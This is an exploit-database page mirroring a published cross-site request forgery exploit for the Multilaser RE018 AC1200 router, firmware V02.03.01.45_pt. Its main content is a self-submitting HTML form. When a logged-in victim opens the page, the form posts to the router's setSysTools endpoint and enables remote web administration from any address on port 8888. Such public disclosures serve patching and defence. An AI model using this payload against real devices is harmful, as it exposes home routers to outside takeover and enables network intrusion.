Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040121

Below is a copy:

Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
|===========================================================================
| # Exploit Title : Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
|                                                                           
| # Author : Ali Seddigh                                                    
|                                                                           
| # Category : Web Application
|                                                                           
| # Tested on : [ Windows ~> 10]                                                     
|
| # Version: Firmware V02.03.01.45_pt
|                  
| # Date : 2021-04-21                                                     
|===========================================================================
| # Exploit code :


<html>
<body>
<form action="http://192.168.0.1/goform/setSysTools" method="POST">
    <input name="module4" value="remoteWeb" type="hidden">
    <input name="remoteWebType" value="any" type="hidden">
    <input name="remoteWebIP" value="" type="hidden">
    <input name="remoteWebPort" value="8888" type="hidden">
                <input type="submit" value="Submit request">
</form>
</body>
<script>
document.forms[0].submit();
</script>
</body>
</html>


|===========================================================================
| # Discovered By : Ali Triplex                                             
|===========================================================================

Copyright ©2021 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.